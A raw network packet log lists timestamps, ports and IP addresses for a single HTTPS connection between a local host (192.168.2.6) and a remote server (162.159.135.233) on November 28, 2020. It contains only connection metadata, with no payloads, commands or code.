Nov 28, 2020 10:25:11.176831007 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176847935 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176872015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176897049 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176919937 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176924944 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176944971 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176949024 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176969051 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176986933 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176996946 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177021980 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177043915 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177047014 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.177068949 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177092075 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177094936 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.177109003 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.177153111 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.190637112 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.190660954 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.190716982 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193495035 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193521976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193541050 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193557978 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193577051 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193583012 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193594933 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193613052 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193623066 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193634987 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193656921 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193675995 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193681955 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193691969 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193705082 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193717957 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193734884 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193752050 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193764925 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193782091 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193784952 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193799019 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193809986 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193816900 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193831921 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193842888 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193850040 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193871021 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193907976 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193917990 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193942070 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193948030 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193962097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193974018 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.193979025 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.193995953 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194015026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194017887 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194031954 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194046021 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194051027 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194070101 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194082022 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194089890 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194109917 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194118023 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194127083 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194144964 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194154024 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194160938 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194178104 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194190979 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194195986 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194214106 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194221973 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194235086 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194243908 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194324970 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194356918 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194375038 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194385052 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194387913 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194402933 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194420099 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194437027 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194439888 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194448948 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.194456100 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.194495916 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.206995964 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.207017899 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.207091093 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210031033 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210052013 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210134983 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210572958 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210594893 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210614920 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210642099 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210661888 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210669994 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210680962 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210701942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210721016 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210745096 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210767031 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210786104 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210804939 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210824013 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210824013 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210844040 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210864067 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210882902 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210903883 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210917950 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210939884 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210944891 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.210956097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210977077 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.210999012 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211010933 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211019993 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211039066 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211056948 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211071968 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211080074 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211091995 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211102009 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211121082 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211132050 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211141109 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211159945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211170912 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211180925 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211199999 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211218119 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211226940 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211241007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211258888 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211262941 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211282015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211294889 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211301088 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211319923 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211325884 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211352110 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211370945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211390018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211399078 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211410046 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211433887 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211442947 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211455107 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211464882 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211474895 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211494923 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211504936 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.211508989 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.211574078 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223397017 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223436117 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223465919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223481894 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223500013 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223529100 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223534107 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223562956 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223592043 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223603964 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223622084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223651886 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223681927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223683119 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223710060 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223747969 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223779917 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223809004 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223815918 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223838091 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223866940 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223892927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223922014 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223949909 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223962069 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.223983049 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.223995924 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.224014044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.224040985 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.224067926 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.224078894 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.224096060 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.224128008 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.225027084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225048065 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225065947 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225084066 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225106955 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225112915 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.225128889 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.225161076 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.226294994 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.226315975 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.226367950 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.227721930 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227755070 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227777958 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.227904081 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227930069 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227941990 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.227953911 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227973938 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.227997065 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228018999 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228039026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228044033 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228060961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228081942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228085041 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228106976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228110075 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228130102 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228147984 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228168964 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228178024 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228189945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228199005 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228205919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228226900 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228246927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228270054 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228291988 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228292942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228297949 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228313923 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228334904 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228358030 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228368044 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228380919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228393078 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228405952 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228426933 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228440046 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228450060 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228472948 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228486061 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228493929 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228513956 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228519917 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228534937 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228554964 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228581905 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228598118 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228601933 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228621960 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228625059 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228642941 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228662968 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228668928 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228678942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228693008 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228703022 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228714943 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228730917 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228737116 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228755951 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.228797913 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.228802919 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.240572929 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.240603924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.240628958 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.240645885 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241085052 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241123915 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241147995 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241173983 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241198063 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241219044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241240025 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241261005 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.241276979 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242613077 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242638111 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242660999 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242682934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242710114 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242736101 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242758036 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242780924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242803097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242824078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242846012 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242867947 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242893934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242918015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242938995 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242960930 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.242983103 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243004084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243026018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243046999 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243072987 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243098974 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243119001 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.243952036 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245114088 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245147943 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245174885 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245206118 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245237112 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245265007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245292902 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245321035 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245357990 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245414019 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245449066 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245480061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245511055 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245532036 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245568037 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245600939 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245630026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245661020 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245690107 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245718956 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245748043 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245776892 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245810986 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245837927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245862007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245884895 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245907068 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245929003 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245949984 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245973110 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.245995045 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246016979 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246040106 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246062994 CET	443	49734	162.159.135.233	192.168.2.6
